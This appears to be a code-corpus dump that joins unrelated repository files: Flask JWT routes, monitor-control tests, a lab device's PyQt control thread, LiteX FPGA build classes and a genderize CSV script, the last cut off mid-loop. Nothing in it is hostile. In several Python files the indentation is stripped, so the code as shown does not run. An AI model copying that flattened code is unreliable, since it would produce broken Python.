Requires a valid jwt token for access to method. [fjwtfresh]_
Returns:
flask.response: A JSONified object containing the updated contents of
the login page. [fjsonify]_
"""
current_user = get_jwt_identity()
ret = {
'access_token': create_access_token(identity=current_user)
}
return jsonify(ret), 200
@blueprint.route('/logout', methods=['DELETE'])
@jwt_required
def logout():
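    """Revoke the current access token by adding its JTI to the in-memory blacklist.
    Returns:
        flask.Response: A JSON confirmation message. [fjsonify]_
    """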
jti = get_raw_jwt()['jti']
blacklist.add(jti)
return jsonify({"msg": "Successfully logged out"}), 200
@jwt.user_loader_callback_loader
def user_loader_callback(identity):
"""Returns user information.
Parameters:
identity: The unique identifier for the user.
Returns:
flask.response: The user data as a JSON dictionary.
"""
return User.query.get(identity)
```
#### File: smoke-backend/smoke_backend/manage.py
```python
import click
from flask.cli import FlaskGroup
from smoke_backend.app import create_app
def create_smoke(info):
"""Get application from application factory method.
Parameters:
info (str): Currently not used.
Returns:
Flask: The Flask [f]_ controller object for the backend
"""
return create_app(cli=True)
@click.group(cls=FlaskGroup, create_app=create_smoke)
def cli():
"""Main entry point
Forms the entry point for when this method is called as a stand-alone
application.
"""
@cli.command("init")
def init():
"""Initialize application
    Drops and recreates the SQLAlchemy [flasksqla]_ database; the default user is added by the seed command.
"""
from smoke_backend.extensions import db
click.echo("drop old database")
db.reflect()
db.drop_all()
click.echo("create database")
db.create_all()
click.echo("done")
@cli.command("seed")
def seed():
"""Seeds the database with the standard privilege values.
Relative values noted here are in *descending order*, in that a relative
privilege value of 3 is the highest value.
Function also initializes the default user, with a privilege value of
Admin (3).
Values:
Student: User which defines the code to test. (Relative value: 1)
Teacher: User which defines the test cases. (Relative value: 2)
Admin: User which has complete access. (Relative value 3)
"""
from smoke_backend.extensions import db
from smoke_backend.models import Privilege, User
privilege1 = Privilege(permission_level="STUDENT")
privilege2 = Privilege(permission_level="TEACHER")
privilege3 = Privilege(permission_level="ADMIN")
click.echo("create priveledges")
db.session.add(privilege1)
db.session.add(privilege2)
db.session.add(privilege3)
db.session.commit()
click.echo("create user admin")
user = User(
username='admin',
email='<EMAIL>',
password='<PASSWORD>',
active=True,
privilege=Privilege.query.get(3)
)
db.session.add(user)
db.session.commit()
click.echo("done")
if __name__ == "__main__":
cli()
``` |
{
"source": "JosephBrooksbank/monitorcontrol",
"score": 3
} |
#### File: monitorcontrol/vcp/vcp_abc.py
```python
import abc
from types import TracebackType
from typing import Optional, Tuple, Type
class VCPError(Exception):
""" Base class for all VCP related errors. """
pass
class VCPIOError(VCPError):
""" Raised on VCP IO errors. """
pass
class VCPPermissionError(VCPError):
""" Raised on VCP permission errors. """
pass
class VCP(abc.ABC):
@abc.abstractmethod
def __enter__(self):
pass
@abc.abstractmethod
def __exit__(
self,
exception_type: Optional[Type[BaseException]],
exception_value: Optional[BaseException],
exception_traceback: Optional[TracebackType],
) -> Optional[bool]:
pass
@abc.abstractmethod
def set_vcp_feature(self, code: int, value: int):
"""
Sets the value of a feature on the virtual control panel.
Args:
code: Feature code.
value: Feature value.
Raises:
VCPError: Failed to set VCP feature.
"""
pass
@abc.abstractmethod
def get_vcp_feature(self, code: int) -> Tuple[int, int]:
"""
Gets the value of a feature from the virtual control panel.
Args:
code: Feature code.
Returns:
Current feature value, maximum feature value.
Raises:
VCPError: Failed to get VCP feature.
"""
pass
```
#### File: monitorcontrol/tests/test_monitorcontrol.py
```python
from monitorcontrol import vcp
from monitorcontrol.monitorcontrol import (
InputSource,
get_monitors,
get_vcps,
Monitor,
)
from types import TracebackType
from typing import Iterable, List, Optional, Tuple, Type, Union
import pytest
from unittest import mock
# set to true to run the unit test on your monitors
USE_ATTACHED_MONITORS = False
class UnitTestVCP(vcp.VCP):
def __init__(self, vcp_dict: dict):
self.vcp = vcp_dict
def set_vcp_feature(self, code: int, value: int):
self.vcp[code]["current"] = value
def get_vcp_feature(self, code: int) -> Tuple[int, int]:
return self.vcp[code]["current"], self.vcp[code]["maximum"]
def get_vcp_capabilities(self):
# example string from Acer VG271U
# does not necessarily align with other test code.
# Reported capabilities could be different.
return (
"(prot(monitor)type(LCD)model(ACER VG271U)cmds(01 02 03 07 0C"
" E3 F3)vcp(04 10 12 14(05 06 08 0B) 16 18 1A 59 5A 5B 5C 5D"
" 5E 60(0F 11 12)62 9B 9C 9D 9E 9F A0 D6 E0(00 04 05 06) E1(00"
" 01 02)E2(00 01 02 03 05 06 07 0B 10 11 12)E3 E4 E5 E7(00 01"
" 02) E8(00 01 02 03 04)) mswhql(1)asset_eep(40)mccs_ver(2.2))"
)
def __enter__(self):
pass
def __exit__(
self,
exception_type: Optional[Type[BaseException]],
exception_value: Optional[BaseException],
exception_traceback: Optional[TracebackType],
) -> Optional[bool]:
pass
def test_context_manager_assert():
m = Monitor(None)
with pytest.raises(AssertionError):
m.get_power_mode()
def test_get_vcps():
get_vcps()
def test_get_monitors():
get_monitors()
def get_test_vcps() -> List[Type[vcp.VCP]]:
if USE_ATTACHED_MONITORS:
return get_vcps()
else:
unit_test_vcp_dict = {
0x10: {"current": 50, "maximum": 100},
0xD6: {"current": 1, "maximum": 5},
0x12: {"current": 50, "maximum": 100},
0x60: {"current": "HDMI1", "maximum": 3},
}
return [UnitTestVCP(unit_test_vcp_dict)]
@pytest.fixture(scope="module", params=get_test_vcps())
def monitor(request) -> Iterable[Monitor]:
monitor = Monitor(request.param)
with monitor:
yield monitor
def test_get_code_maximum_type_error(monitor: Monitor):
code = vcp.VCPCode("image_factory_default")
with pytest.raises(TypeError):
monitor._get_code_maximum(code)
def test_set_vcp_feature_type_error(monitor: Monitor):
code = vcp.VCPCode("active_control")
with pytest.raises(TypeError):
monitor._set_vcp_feature(code, 1)
def test_get_vcp_feature_type_error(monitor: Monitor):
code = vcp.VCPCode("image_factory_default")
with pytest.raises(TypeError):
monitor._get_vcp_feature(code)
@pytest.mark.parametrize(
"luminance, expected", [(100, 100), (0, 0), (50, 50), (101, ValueError)]
)
def test_luminance(
monitor: Monitor, luminance: int, expected: Union[int, Type[Exception]]
):
original = monitor.get_luminance()
try:
if isinstance(expected, int):
monitor.set_luminance(luminance)
assert monitor.get_luminance() == expected
elif isinstance(expected, type(Exception)):
with pytest.raises(expected):
monitor.set_luminance(luminance)
finally:
monitor.set_luminance(original)
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="not going to change your contrast"
)
def test_contrast(monitor: Monitor):
contrast = monitor.get_contrast()
contrast += 1
monitor.set_contrast(contrast)
assert monitor.get_contrast() == contrast
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="not going to turn off your monitors"
)
@pytest.mark.parametrize(
"mode, expected",
[
# always recoverable for real monitors
("on", 0x01),
(0x01, 0x01),
("INVALID", AttributeError),
(["on"], TypeError),
(0x00, ValueError),
(0x06, ValueError),
# sometimes recoverable for real monitors
("standby", 0x02),
("suspend", 0x03),
("off_soft", 0x04),
# rarely recoverable for real monitors
("off_hard", 0x05),
],
)
def test_power_mode(
monitor: Monitor,
mode: Union[str, int],
expected: Union[int, Type[Exception]],
):
if isinstance(expected, (int, str)):
monitor.set_power_mode(mode)
power_mode = monitor.get_power_mode().value
if expected != 0x01:
# Acer XF270HU empirical testing: monitor reports zero when in any
# power mode that is not on
assert power_mode == expected or power_mode == 0x00
else:
assert monitor.get_power_mode().value == expected
elif isinstance(expected, type(Exception)):
with pytest.raises(expected):
monitor.set_power_mode(mode)
# ASUS VG27A, when set to a mode that doesn't exist, returns analog1 (0x1)
@pytest.mark.skipif(
    USE_ATTACHED_MONITORS, reason="Real monitors don't support all input types"
)
@pytest.mark.parametrize(
"mode, expected",
[
(InputSource.ANALOG1, 0x01),
(InputSource.ANALOG2, 0x02),
(InputSource.DVI1, 0x03),
(InputSource.DVI2, 0x04),
(InputSource.COMPOSITE1, 0x05),
(InputSource.COMPOSITE2, 0x06),
(InputSource.SVIDEO1, 0x07),
(InputSource.SVIDEO2, 0x08),
(InputSource.TUNER1, 0x09),
(InputSource.TUNER2, 0x0A),
(InputSource.TUNER3, 0x0B),
(InputSource.CMPONENT1, 0x0C),
(InputSource.CMPONENT2, 0x0D),
(InputSource.CMPONENT3, 0x0E),
(InputSource.DP1, 0x0F),
(InputSource.DP2, 0x10),
(InputSource.HDMI1, 0x11),
(InputSource.HDMI2, 0x12),
],
)
def test_input_source(
monitor: Monitor,
mode: Union[str, int],
expected: Tuple[InputSource, int],
):
monitor.set_input_source(mode)
read_source = monitor.get_input_source()
assert read_source == mode
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="No value in testing this with real monitors"
)
def test_input_source_issue_59(monitor: Monitor):
"""
Some monitors seem to duplicate the low byte (input source)
to the high byte (reserved).
See https://github.com/newAM/monitorcontrol/issues/59
"""
with mock.patch.object(monitor, "_get_vcp_feature", return_value=0x1010):
input_source = monitor.get_input_source()
assert input_source == InputSource.DP2
def test_get_vcp_capabilities(monitor: Monitor):
monitors_dict = monitor.get_vcp_capabilities()
model = monitors_dict["model"]
inputs = monitors_dict["inputs"]
print(inputs)
if model != "ACER VG271U":
raise AssertionError("Could not parse model")
if set(inputs) != {"DP1", "HDMI1", "HDMI2"}:
raise AssertionError("Could not parse input sources")
``` |
{
"source": "JosephBrunet/tension_inflation",
"score": 2
} |
#### File: JosephBrunet/tension_inflation/setup.py
```python
from setuptools import setup, find_packages
import os.path
# The directory containing this file
HERE = os.path.abspath(os.path.dirname(__file__))
# The text of the README file
with open(os.path.join(HERE, "README.md")) as fid:
README = fid.read()
def package_files(directory):
paths = []
for (path, directories, filenames) in os.walk(directory):
for filename in filenames:
paths.append(os.path.join('..', path, filename))
return paths
extra_files = package_files(HERE+'/tension_inflation/resources')
print(extra_files)
setup(name='tension_inflation',
version='1.0.0',
description='Software controlling the tension-inflation device',
long_description=README, # Optional
long_description_content_type='text/markdown',
url='https://github.com/JosephBrunet/tension_inflation.git',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
package_dir={'': 'tension_inflation'},
packages=find_packages(where='tension_inflation'),
package_data={'': extra_files},
python_requires='>=3',
install_requires=['PyQt5','pyserial','pyqtgraph','simple-pid','PIPython'],
entry_points={
'gui_scripts':['tension_inflation=tension_inflation.GUI_main:main',],
'console_scripts': ['tension_inflation_console=tension_inflation.GUI_main:main',],
},
)
```
#### File: modules/mainwindow_modules/CommandThread.py
```python
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import QSize, Qt, QRegExp, QThread, QThreadPool, QObject, pyqtSignal
import numpy as np #For mathematics
import time
from tension_inflation.modules.sensors_dialogs import MotorPI #Program to control the axial motor
from tension_inflation.modules.sensors_dialogs import Arduino #Module to connect to and read from the Arduino microcontroller
from tension_inflation.modules.sensors_dialogs import Pump_seringe #Program to control the pump
from simple_pid import PID
class CommandThread(QThread):
"""Command Motor and then Pump"""
    signal_end = pyqtSignal() #Signals emitted by the thread
update_thread = QtCore.pyqtSignal()
def __init__(self, dF_target, PV_target, NcycleF, NcycleP, PVmode, FDmode):
super(QThread, self).__init__()
        #Defining the variables passed to the thread from the test window
self.pause = False
self.dF_target = dF_target
self.PV_target = PV_target
self.NcycleF = NcycleF
self.NcycleP = NcycleP
self.PVmode = PVmode
self.FDmode = FDmode
self.flowRate = float(Pump_seringe.getFlowRate())
self.P = False
self.F = False
def stop(self):
"""
Stop the thread
"""
self.pause = True
try:
MotorPI.stop()
except:
print("CommandThread motor")
try:
Pump_seringe.stop()
except:
print("CommandThread pump")
def update_value(self,F,P):
"""
Update the values of load and pressure
"""
self.F=F
self.P=P
def DisplacementControl(self):
#Cycles first
if self.NcycleF != 0:
cycle=0
while cycle < self.NcycleF:
MotorPI.move_rel(self.dF_target)
while MotorPI.ismoving():
#print("motor running")
time.sleep(0.1)
if self.pause == True:
return
MotorPI.move_rel(-self.dF_target)
while MotorPI.ismoving():
time.sleep(0.1)
cycle = cycle +1
if self.pause:
return
MotorPI.move_rel(self.dF_target)
while MotorPI.ismoving():
time.sleep(0.1)
def LoadControl(self):
self.update_thread.emit()
while self.F == False:
time.sleep(0.1)
while self.F < self.dF_target*0.9 or self.F > self.dF_target*1.1 :
self.update_thread.emit()
if self.F < self.dF_target*0.9:
MotorPI.move_rel(0.2)
while MotorPI.ismoving():
time.sleep(0.1)
if self.F > self.dF_target*1.1:
MotorPI.move_rel(-0.2)
while MotorPI.ismoving():
time.sleep(0.1)
self.update_thread.emit()
time.sleep(0.5)
def VolumeControl(self):
#Cycles first
if self.NcycleP != 0:
cycle=0
while cycle < self.NcycleP:
Pump_seringe.dose(self.PV_target)
waitingTime = abs(float(self.PV_target) / float(Pump_seringe.getFlowRate()))*60 + 2
print(str(waitingTime))
time.sleep(waitingTime)
Pump_seringe.dose(-self.PV_target)
waitingTime = abs(float(self.PV_target) / float(Pump_seringe.getFlowRate()))*60 + 2
print(str(waitingTime))
time.sleep(waitingTime)
cycle = cycle +1
Pump_seringe.dose(self.PV_target)
waitingTime = abs(float(self.PV_target) / float(Pump_seringe.getFlowRate()))*60 + 1
print(str(waitingTime))
time.sleep(waitingTime)
def PressureControl(self):
Pump_seringe.set_vol(500) #Set target volume of the pump to not stop the run inadvertently
if self.P > self.PV_target:
self.NcycleP=0
self.update_thread.emit()
#Cycles first
if self.NcycleP != 0:
cycle=0
while cycle < self.NcycleP:
                #Rising cycle (pressurize)
pump_running = False
flag= False
while self.pause == False and flag == False:
self.update_thread.emit()
if self.P > self.PV_target:
Pump_seringe.stop()
pump_running = False
flag = True
if pump_running == False and flag == False:
Pump_seringe.run()
pump_running = True
time.sleep(0.05)
time.sleep(0.05)
                #Falling cycle (depressurize)
pump_running = False
flag= False
while self.pause == False and flag == False:
self.update_thread.emit()
if self.P <= 1:
Pump_seringe.stop()
pump_running = False
flag = True
if pump_running == False and flag == False:
Pump_seringe.run_reverse()
pump_running = True
time.sleep(0.05)
cycle = cycle +1
print("Go to "+str(self.PV_target))
time.sleep(0.05)
        #MANAGE PRESSURE BELOW TARGET
if self.P < self.PV_target:
Pump_seringe.run()
while self.pause == False and self.P < self.PV_target*0.98:
self.update_thread.emit()
time.sleep(0.1)
Pump_seringe.stop()
pid = PID(1, 0.1, 0.05, setpoint=self.PV_target)
            pid.sample_time = 0.1  # update every 0.1 seconds
pid.output_limits = (0, 5)
start = time.time()
while self.pause == False:
self.update_thread.emit()
                # compute new output from the PID according to the system's current value
output = pid(self.P)
print("Pump flow rate: "+str(output))
if time.time() - start > 0.5:
# feed the PID output to the system and get its current value
Pump_seringe.stop()
Pump_seringe.setFlowRate(output)
Pump_seringe.run()
start = time.time()
time.sleep(0.01)
time.sleep(0.01)
Pump_seringe.stop()
Pump_seringe.setFlowRate(self.flowRate)
        #MANAGE PRESSURE ABOVE TARGET
elif self.P > self.PV_target:
pump_running = False
flag= False
Pump_seringe.setFlowRate(self.flowRate)
while self.pause == False and flag == False:
self.update_thread.emit()
if self.P < self.PV_target:
Pump_seringe.stop()
pump_running = False
flag = True
if self.P > self.PV_target and pump_running == False:
Pump_seringe.run_reverse()
pump_running = True
self.update_thread.emit()
time.sleep(0.05)
def run(self):
print("thread start")
######################################################################
## Motor (displacement)
######################################################################
if self.FDmode == 'D' and not self.dF_target == '':
self.DisplacementControl()
elif self.FDmode == 'F' and not self.dF_target == '':
self.LoadControl()
if self.pause:
return
######################################################################
## PUMP
######################################################################
if self.PVmode == 'V' and not self.PV_target == '':
self.VolumeControl()
        elif self.PVmode == 'P' and not self.PV_target == '': ## CONSTANT PRESSURE MODE
self.PressureControl()
print("QThread terminated")
self.signal_end.emit()
``` |
{
"source": "josephburnett/vaping",
"score": 3
} |
#### File: vaping/vaping/config.py
```python
import re
import munge
def parse_interval(val):
"""
    converts an interval string to a float of seconds
    "500ms" -> 0.5
    "1m30s" -> 90.0
**Arguments**
- val (`str`)
"""
re_intv = re.compile(r"([\d\.]+)([a-zA-Z]+)")
val = val.strip()
total = 0.0
for match in re_intv.findall(val):
unit = match[1]
count = float(match[0])
if unit == "s":
total += count
elif unit == "m":
total += count * 60
elif unit == "ms":
total += count / 1000
elif unit == "h":
total += count * 3600
elif unit == "d":
total += count * 86400
else:
raise ValueError("unknown unit from interval string '%s'" % val)
return total
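# Example sketch (hedged, not part of the original module):
#   parse_interval("500ms") -> 0.5
#   parse_interval("1m30s") -> 90.0
#   parse_interval("1h")    -> 3600.0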
class Config(munge.Config):
"""
Vaping config manager
"""
defaults = {
"config": {
"vaping": {"home_dir": None, "pidfile": "vaping.pid", "plugin_path": [],},
},
"config_dir": "~/.vaping",
"codec": "yaml",
}
``` |
{
"source": "JosephBushagour/litex",
"score": 2
} |
#### File: build/gowin/platform.py
```python
import os
from litex.build.generic_platform import GenericPlatform
from litex.build.gowin import common, gowin
# GowinPlatform -----------------------------------------------------------------------------------
class GowinPlatform(GenericPlatform):
bitstream_ext = ".fs"
def __init__(self, device, *args, toolchain="gowin", devicename=None, **kwargs):
GenericPlatform.__init__(self, device, *args, **kwargs)
if not devicename:
idx = device.find('-')
likely_name = f"{device[:idx]}-{device[idx+3]}"
raise ValueError(f"devicename not provided, maybe {likely_name}?")
self.devicename = devicename
if toolchain == "gowin":
self.toolchain = gowin.GowinToolchain()
elif toolchain == "apicula":
raise ValueError("Apicula toolchain needs more work")
else:
raise ValueError("Unknown toolchain")
def get_verilog(self, *args, special_overrides=dict(), **kwargs):
so = dict(common.gowin_special_overrides)
so.update(special_overrides)
return GenericPlatform.get_verilog(self, *args, special_overrides=so,
attr_translate=self.toolchain.attr_translate,
**kwargs)
def build(self, *args, **kwargs):
return self.toolchain.build(self, *args, **kwargs)
```
#### File: litex/build/openfpgaloader.py
```python
from litex.build.tools import write_to_file
from litex.build.generic_programmer import GenericProgrammer
# openFPGAloader ------------------------------------------------------------------------------------------
class OpenFPGALoader(GenericProgrammer):
needs_bitreverse = False
def __init__(self, board):
self.board = board
def load_bitstream(self, bitstream_file):
cmd = ["openFPGALoader", "--board", self.board, "--bitstream", bitstream_file]
self.call(cmd)
def flash(self, address, data_file):
cmd = ["openFPGALoader", "--board", self.board, "--write-flash", "--bitstream", data_file]
if address:
cmd.append("--offset")
cmd.append(address)
self.call(cmd)
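# Usage sketch (the board name "tangnano" is an illustrative assumption):
#   OpenFPGALoader("tangnano").load_bitstream("build/gateware/top.fs")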
```
#### File: cores/clock/xilinx_s6.py
```python
from migen import *
from litex.soc.cores.clock.common import *
from litex.soc.cores.clock.xilinx_common import *
# Xilinx / Spartan6 --------------------------------------------------------------------------------
class S6PLL(XilinxClocking):
nclkouts_max = 6
clkin_freq_range = (19e6, 540e6)
def __init__(self, speedgrade=-1):
self.logger = logging.getLogger("S6PLL")
self.logger.info("Creating S6PLL, {}.".format(colorer("speedgrade {}".format(speedgrade))))
XilinxClocking.__init__(self)
self.divclk_divide_range = (1, 52 + 1)
self.vco_freq_range = {
-1: (400e6, 1000e6),
-2: (400e6, 1000e6),
-3: (400e6, 1080e6),
}[speedgrade]
def do_finalize(self):
XilinxClocking.do_finalize(self)
config = self.compute_config()
pll_fb = Signal()
self.params.update(
# Global.
p_SIM_DEVICE = "SPARTAN6",
p_BANDWIDTH = "OPTIMIZED",
p_COMPENSATION = "INTERNAL",
i_RST = self.reset,
i_PWRDWN = self.power_down,
o_LOCKED = self.locked,
# VCO.
p_REF_JITTER = .01, p_CLK_FEEDBACK="CLKFBOUT",
p_CLKIN1_PERIOD = 1e9/self.clkin_freq,
p_CLKIN2_PERIOD = 0.,
p_CLKFBOUT_MULT = config["clkfbout_mult"],
p_CLKFBOUT_PHASE = 0.,
p_DIVCLK_DIVIDE = config["divclk_divide"],
i_CLKINSEL = 1,
i_CLKIN1 = self.clkin,
i_CLKFBIN = pll_fb,
o_CLKFBOUT = pll_fb,
)
for n, (clk, f, p, m) in sorted(self.clkouts.items()):
self.params["p_CLKOUT{}_DIVIDE".format(n)] = config["clkout{}_divide".format(n)]
self.params["p_CLKOUT{}_PHASE".format(n)] = float(config["clkout{}_phase".format(n)])
self.params["p_CLKOUT{}_DUTY_CYCLE".format(n)] = 0.5
self.params["o_CLKOUT{}".format(n)] = clk
self.specials += Instance("PLL_ADV", **self.params)
class S6DCM(XilinxClocking):
""" single output with f_out = f_in * {2 .. 256} / {1 .. 256} """
nclkouts_max = 1
clkfbout_mult_frange = (2, 256 + 1)
clkout_divide_range = (1, 256 + 1)
def __init__(self, speedgrade=-1):
self.logger = logging.getLogger("S6DCM")
self.logger.info("Creating S6DCM, {}.".format(colorer("speedgrade {}".format(speedgrade))))
XilinxClocking.__init__(self)
self.divclk_divide_range = (1, 2) # FIXME
self.clkin_freq_range = {
-1: (0.5e6, 200e6),
-2: (0.5e6, 333e6),
-3: (0.5e6, 375e6),
}[speedgrade]
self.vco_freq_range = {
-1: (5e6, 1e16),
-2: (5e6, 1e16),
-3: (5e6, 1e16),
}[speedgrade]
def do_finalize(self):
XilinxClocking.do_finalize(self)
config = self.compute_config()
clk, f, p, m = sorted(self.clkouts.items())[0][1]
self.params.update(
p_CLKFX_MULTIPLY = config["clkfbout_mult"],
p_CLKFX_DIVIDE = config["clkout0_divide"] * config["divclk_divide"],
p_SPREAD_SPECTRUM = "NONE",
p_CLKIN_PERIOD = 1e9/self.clkin_freq,
i_CLKIN = self.clkin,
i_RST = self.reset,
i_FREEZEDCM = 0,
o_CLKFX = clk,
o_LOCKED = self.locked,
)
self.specials += Instance("DCM_CLKGEN", **self.params)
def expose_drp(self):
self._cmd_data = CSRStorage(10)
self._send_cmd_data = CSR()
self._send_go = CSR()
self._status = CSRStatus(4)
progdata = Signal()
progen = Signal()
progdone = Signal()
locked = Signal()
self.params.update(
i_PROGCLK = ClockSignal(),
i_PROGDATA = progdata,
i_PROGEN = progen,
o_PROGDONE = progdone
)
remaining_bits = Signal(max=11)
transmitting = Signal()
self.comb += transmitting.eq(remaining_bits != 0)
sr = Signal(10)
self.sync += [
If(self._send_cmd_data.re,
remaining_bits.eq(10),
sr.eq(self._cmd_data.storage)
).Elif(transmitting,
remaining_bits.eq(remaining_bits - 1),
sr.eq(sr[1:])
)
]
self.comb += [
progdata.eq(transmitting & sr[0]),
progen.eq(transmitting | self._send_go.re)
]
# Enforce gap between commands
busy_counter = Signal(max=14)
busy = Signal()
self.comb += busy.eq(busy_counter != 0)
self.sync += If(self._send_cmd_data.re,
busy_counter.eq(13)
).Elif(busy,
busy_counter.eq(busy_counter - 1)
)
self.comb += self._status.status.eq(Cat(busy, progdone, self.locked))
self.logger.info("Exposing DRP interface.")
```
#### File: cpu/minerva/core.py
```python
import os
import subprocess
from migen import *
from litex import get_data_mod
from litex.soc.interconnect import wishbone
from litex.soc.cores.cpu import CPU, CPU_GCC_TRIPLE_RISCV32
# Variants -----------------------------------------------------------------------------------------
CPU_VARIANTS = ["standard"]
# Minerva ------------------------------------------------------------------------------------------
class Minerva(CPU):
name = "minerva"
human_name = "Minerva"
variants = CPU_VARIANTS
data_width = 32
endianness = "little"
gcc_triple = CPU_GCC_TRIPLE_RISCV32
linker_output_format = "elf32-littleriscv"
nop = "nop"
io_regions = {0x80000000: 0x80000000} # Origin, Length.
# GCC Flags.
@property
def gcc_flags(self):
flags = "-march=rv32im "
flags += "-mabi=ilp32 "
flags += "-D__minerva__ "
return flags
def __init__(self, platform, variant="standard"):
self.platform = platform
self.variant = variant
self.reset = Signal()
self.interrupt = Signal(32)
self.ibus = ibus = wishbone.Interface()
self.dbus = dbus = wishbone.Interface()
self.periph_buses = [self.ibus, self.dbus] # Peripheral buses (Connected to main SoC's bus).
self.memory_buses = [] # Memory buses (Connected directly to LiteDRAM).
# # #
self.cpu_params = dict(
# Clk / Rst.
i_clk = ClockSignal("sys"),
i_rst = ResetSignal("sys") | self.reset,
# IRQ.
i_timer_interrupt = 0,
i_software_interrupt = 0,
i_external_interrupt = self.interrupt,
# Ibus.
o_ibus__stb = ibus.stb,
o_ibus__cyc = ibus.cyc,
o_ibus__cti = ibus.cti,
o_ibus__bte = ibus.bte,
o_ibus__we = ibus.we,
o_ibus__adr = ibus.adr,
o_ibus__dat_w = ibus.dat_w,
o_ibus__sel = ibus.sel,
i_ibus__ack = ibus.ack,
i_ibus__err = ibus.err,
i_ibus__dat_r = ibus.dat_r,
# Dbus.
o_dbus__stb = dbus.stb,
o_dbus__cyc = dbus.cyc,
o_dbus__cti = dbus.cti,
o_dbus__bte = dbus.bte,
o_dbus__we = dbus.we,
o_dbus__adr = dbus.adr,
o_dbus__dat_w = dbus.dat_w,
o_dbus__sel = dbus.sel,
i_dbus__ack = dbus.ack,
i_dbus__err = dbus.err,
i_dbus__dat_r = dbus.dat_r,
)
def set_reset_address(self, reset_address):
assert not hasattr(self, "reset_address")
self.reset_address = reset_address
@staticmethod
def elaborate(reset_address, with_icache, with_dcache, with_muldiv, verilog_filename):
cli_params = []
cli_params.append("--reset-addr={}".format(reset_address))
if with_icache:
cli_params.append("--with-icache")
if with_dcache:
cli_params.append("--with-dcache")
if with_muldiv:
cli_params.append("--with-muldiv")
cli_params.append("generate")
cli_params.append("--type=v")
sdir = get_data_mod("cpu", "minerva").data_location
if subprocess.call(["python3", os.path.join(sdir, "cli.py"), *cli_params],
stdout=open(verilog_filename, "w")):
raise OSError("Unable to elaborate Minerva CPU, please check your nMigen/Yosys install")
def do_finalize(self):
assert hasattr(self, "reset_address")
verilog_filename = os.path.join(self.platform.output_dir, "gateware", "minerva.v")
self.elaborate(
reset_address = self.reset_address,
with_icache = True,
with_dcache = True,
with_muldiv = True,
verilog_filename = verilog_filename)
self.platform.add_source(verilog_filename)
self.specials += Instance("minerva_cpu", **self.cpu_params)
```
#### File: litex/test/test_icap.py
```python
import unittest
from migen import *
from litex.soc.cores.icap import ICAP, ICAPBitstream
class TestICAP(unittest.TestCase):
def test_icap_command_reload(self):
def generator(dut):
yield dut.addr.eq(0x4)
yield dut.data.eq(0xf)
for i in range(16):
yield
yield dut.send.eq(1)
yield
yield dut.send.eq(0)
for i in range(256):
yield
dut = ICAP(with_csr=False, simulation=True)
clocks = {"sys": 10, "icap":20}
run_simulation(dut, generator(dut), clocks, vcd_name="icap.vcd")
def test_icap_bitstream_syntax(self):
dut = ICAPBitstream(simulation=True)
``` |
{
"source": "JosephCantrell/UmbrellaSecondAssessment",
"score": 3
} |
#### File: JosephCantrell/UmbrellaSecondAssessment/genderize.py
```python
from genderize import Genderize, GenderizeException
import csv
import sys
import os.path
import time
import argparse
import logging
import jpyhelper as jpyh
# Allow override command line input FINISHED
# Allow user input override search column through command line FINISHED
# Create override column searching FINISHED
# Strip leading and tailing whitespaces from overriden values FINISHED
# Allow different headers to be written based off of if we are overriding FINISHED
# Print the original file columns if we are overriding FINISHED
# Allow -a to work with overrides FINISHED
# TEST CASES:
# No Override, No -a Tested on file "test_big.csv" SUCCESS - 300 Names and gender info written
# No Override, Yes -a Tested on file "test_big.csv" SUCCESS - 149 Names and gender info written
# Yes Override, No -a Tested on file "genderize_test_file.csv" SUCCESS - 51 Names, original information, and Gender info written
# Yes Override, Yes -a Tested on file "genderize_test_file.csv" SUCCESS - 45 Names, original information, and Gender info written
# Created this function with the intention of having it used in multiple locations, but ended up only needed it in one.
# This function iterates through a given list to find every value at the given position.
# It then saves this position to a list, where we later pop the list item and return the list.
def remove_dupes(list, search_column):
names = []
remove_list = []
for index, row in enumerate(list):
stripped = row[search_column].strip()
if stripped not in names:
names.append(stripped)
else:
remove_list.append(index)
    # I know there is a better way to do this, but I could not pop items off of the list in the for loop above
    # without losing an item. A second "michael" was showing up in the final csv file. This method allowed me to get
    # a proper output on the csv file.
    for index, remove in enumerate(remove_list):
        list.pop(remove - index)
return list
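# Example sketch (hedged, not part of the original script):
#   remove_dupes([["bob"], ["ann"], ["bob "]], 0) -> [["bob"], ["ann"]]
# since values are stripped before comparing, "bob " counts as a duplicate.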
# Created a function to write new headers into the csv file. Used in two locations.
def write_headers(writer, original_headers):
new_headers = ["gender", "probability", "count"]
# Add the new headers on the tail end of our original headers list.
original_headers = original_headers + new_headers
# Write the original headers list to the output csv file
writer.writerow(original_headers)
def genderize(args):
print(args)
#File initialization
dir_path = os.path.dirname(os.path.realpath(__file__))
logging.basicConfig(filename=dir_path + os.sep + "log.txt", level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger=logging.getLogger(__name__)
ofilename, ofile_extension = os.path.splitext(args.output)
ofile = ofilename + "_" + time.strftime("%Y%m%d-%H%M%S") + ".csv"
ifile = args.input
if os.path.isabs(ifile):
print("\n--- Input file: " + ifile)
else:
print("\n--- Input file: " + dir_path + os.sep + ifile)
if os.path.isabs(ofile):
print("--- Output file: " + ofile)
else:
print("--- Output file: " + dir_path + os.sep + ofile + "\n")
#File integrity checking
if not os.path.exists(ifile):
print("--- Input file does not exist. Exiting.\n")
sys.exit()
if not os.path.exists(os.path.dirname(ofile)):
print("--- Error! Invalid output file path. Exiting.\n")
sys.exit()
#Some set up stuff
##csv.field_size_limit(sys.maxsize)
#Initialize API key
if not args.key == "NO_API":
print("--- API key: " + args.key + "\n")
genderize = Genderize(
user_agent='GenderizeDocs/0.0',
api_key=args.key)
key_present = True
else:
print("--- No API key provided.\n")
key_present = False
# Modify this section to take into account what the user wants to use through the command line
#Open ifile
with open(ifile, 'r', encoding="utf8") as csvfile:
readCSV = csv.reader(csvfile, delimiter=',', skipinitialspace=True)
first_name = []
raw = []
        original_headers = []
is_override = False
column_number = -1
# we are attempting to override the column that the names are stored in
# Easier to check a boolean than to constantly check if args.override is equal to 'NO_OVERRIDE'
if args.override != 'NO_OVERRIDE':
is_override = True
for row in readCSV: #Read CSV into first_name list
# if we are overriding the search column
if is_override:
# ugly nested mess but it works.
# if we have not found the list position of the desired override column
if column_number == -1:
                    # get the first row from the reader (assumed to be the header row)
first_name.append(row)
# also save this to the raw list for later use
raw.append(row)
